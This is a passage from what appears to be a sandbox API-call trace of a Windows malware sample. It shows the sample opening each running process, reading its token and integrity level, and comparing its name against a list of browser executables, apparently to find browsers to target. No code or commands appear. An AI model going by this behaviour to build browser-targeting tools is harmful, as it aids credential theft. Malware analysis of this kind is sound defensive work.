ReturnLength=0xfcfaa0) returned 1 [0235.058] CloseHandle (hObject=0x340) returned 1 [0235.058] CloseHandle (hObject=0x548) returned 1 [0235.059] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.059] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.059] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.059] GetLastError () returned 0x7a [0235.059] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.059] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.059] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.059] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.059] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0235.059] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.059] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.059] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.059] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0235.059] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.059] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.059] GetLastError () returned 0x7a [0235.060] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.060] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.060] CloseHandle (hObject=0x340) returned 1 [0235.060] CloseHandle (hObject=0x548) returned 1 [0235.060] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.060] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.060] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.060] GetLastError () returned 0x7a [0235.060] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.060] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.060] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.060] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0235.060] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0235.061] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0235.061] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0235.061] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0235.061] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0235.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0235.061] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.061] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.061] GetLastError () returned 0x7a [0235.061] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.061] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.061] CloseHandle (hObject=0x340) returned 1 [0235.061] CloseHandle (hObject=0x548) returned 1 [0235.061] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.061] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.062] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.062] GetLastError () returned 0x7a [0235.062] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.062] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.062] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.062] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.062] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0235.062] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.062] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.062] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.062] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0235.062] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.062] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.062] GetLastError () returned 0x7a [0235.062] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.062] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.063] CloseHandle (hObject=0x340) returned 1 [0235.063] CloseHandle (hObject=0x548) returned 1 [0235.063] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.063] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.063] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.063] GetLastError () returned 0x7a [0235.063] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.063] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.063] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.063] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.063] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0235.063] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.063] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.063] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.063] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0235.063] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.063] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.064] GetLastError () returned 0x7a [0235.064] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.064] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.064] CloseHandle (hObject=0x340) returned 1 [0235.064] CloseHandle (hObject=0x548) returned 1 [0235.064] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.064] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.064] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.064] GetLastError () returned 0x7a [0235.064] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.064] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.064] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.064] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.064] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.064] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.064] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.064] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.064] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0235.065] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.065] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.065] GetLastError () returned 0x7a [0235.065] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.065] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.065] CloseHandle (hObject=0x340) returned 1 [0235.065] CloseHandle (hObject=0x548) returned 1 [0235.065] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.065] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.065] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.065] GetLastError () returned 0x7a [0235.065] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.065] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.065] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.065] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0235.065] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0235.065] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0235.065] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0235.065] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0235.065] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0235.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0235.066] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.066] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.066] GetLastError () returned 0x7a [0235.066] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.066] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.066] CloseHandle (hObject=0x340) returned 1 [0235.066] CloseHandle (hObject=0x548) returned 1 [0235.066] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.066] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.066] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.066] GetLastError () returned 0x7a [0235.066] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.066] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.066] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.066] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0235.066] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0235.066] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0235.066] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0235.066] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0235.066] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0235.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0235.066] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.067] GetLastError () returned 0x7a [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.067] CloseHandle (hObject=0x340) returned 1 [0235.067] CloseHandle (hObject=0x548) returned 1 [0235.067] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.067] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.067] GetLastError () returned 0x7a [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.067] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.067] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.067] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0235.067] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0235.067] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0235.067] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0235.067] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0235.067] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0235.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0235.067] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.067] GetLastError () returned 0x7a [0235.067] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.068] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.068] CloseHandle (hObject=0x340) returned 1 [0235.068] CloseHandle (hObject=0x548) returned 1 [0235.068] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.068] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.068] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.068] GetLastError () returned 0x7a [0235.068] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.068] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.068] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.068] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0235.068] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0235.068] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0235.068] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0235.068] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0235.069] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0235.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0235.069] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.069] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.069] GetLastError () returned 0x7a [0235.069] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.069] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, 